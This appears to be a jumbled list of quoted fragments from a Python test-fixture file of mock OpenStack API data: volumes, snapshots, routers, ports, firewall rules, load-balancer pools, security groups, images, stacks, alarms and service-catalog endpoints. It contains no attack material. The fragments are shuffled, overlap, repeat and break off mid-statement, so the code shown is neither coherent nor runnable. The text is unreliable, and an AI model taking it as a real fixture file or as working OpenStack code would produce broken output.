"[\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"]",
"2\" } ] } FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\":",
"{ \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ]",
"[], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST",
"\"volume_type\": \"None\" } ] } SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0],",
"\"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\":",
"}, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\":",
"[], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\":",
"\"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None,",
"COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT",
"'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service',",
"}, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"= { \"stacks\": [ { \"description\": \"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\",",
"License, Version 2.0 (the \"License\"); you may # not use this file except",
"\"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\":",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None,",
"'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"\"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5'",
"'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity'",
"Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}],",
"\"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\",",
"\"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }",
"\"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" }",
"\"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\":",
"} LBAAS_MEMBER_LIST = { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80,",
"1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\",",
"PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" },",
"u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'},",
"\"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = { \"vips\":",
"VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume' },",
"}, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\",",
"\"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": { \"My Server",
"\"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST =",
"\"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ]",
"ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration' }],",
"world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS",
"\"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True,",
"'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type':",
"None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None,",
"\"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\":",
"\"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\",",
"'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1'",
"\"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ]",
"], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\",",
"{ 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [],",
"{ \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\"",
"under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES",
"copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by",
"= [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID =",
"\"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY =",
"\"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'],",
"[{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity",
"[], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = {",
"\"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = { \"firewalls\":",
"Service', 'type': 'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT,",
"\"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\",",
"[ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated':",
"\"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\",",
"\"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\",",
"\"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\":",
"\"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" }",
"'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service',",
"4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\",",
"\"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST",
"\"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1]",
"PROJECT_ID, 'name': 'exampleproject' } }, 'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles': [{",
"except in compliance with the License. You may obtain # a copy of",
"FIREWALL_LIST = { \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\":",
"[], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\":",
"{ \"security_groups\": [ { \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\":",
"\"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\":",
"\"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\",",
"} } } ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74',",
"[{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image",
"[\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"]",
"'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' } } } ROLE_LIST = {u'roles': [",
"= { \"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\",",
"\"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = {",
"\"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\":",
"[ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None,",
"{u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ],",
"\"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 =",
"test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\":",
"'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net'",
"None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, {",
"{ 'description': '', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user': {",
"= 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT =",
"\"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = {",
"'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute'",
"\"shared\": True } ] } SECGROUPS_LIST = { \"security_groups\": [ { \"description\": \"Custom",
"\"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" }",
"PROJECT_ID } ] } FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\":",
"\"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\": [ { \"status\":",
"\"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\":",
"\"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\":",
"\"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25,",
"FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS",
"firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False,",
"\"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False } ] } SERVERS_LIST =",
"\"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\":",
"\"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\":",
"\"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False },",
"[ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\": [ { \"href\":",
"\"allow\", \"ip_version\": 4, \"shared\": False }, { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\",",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity' }, { 'endpoints': [{",
"{ 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"\"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\":",
"u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST",
"IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT",
"True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\":",
"v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\",",
"firewall policy 2\" } ] } FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\":",
"\"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\":",
"\"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\":",
"'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777'",
"\"accessIPv6\": \"\", \"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4 } ]",
"\"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\",",
"} ], \"metadata\": { \"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0,",
"UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS =",
"\"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\",",
"\"action\": \"allow\", \"ip_version\": 4, \"shared\": False } ] } SERVERS_LIST = { \"servers\":",
"\"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\":",
"[], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\",",
"\"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\":",
"'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58'",
"PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, {",
"\"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\",",
"\"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\":",
"\"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\":",
"License for the specific language governing permissions and limitations # under the License.",
"\"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] +",
"\"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = {",
"STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name':",
"{ \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\":",
"\"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\":",
"True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0]",
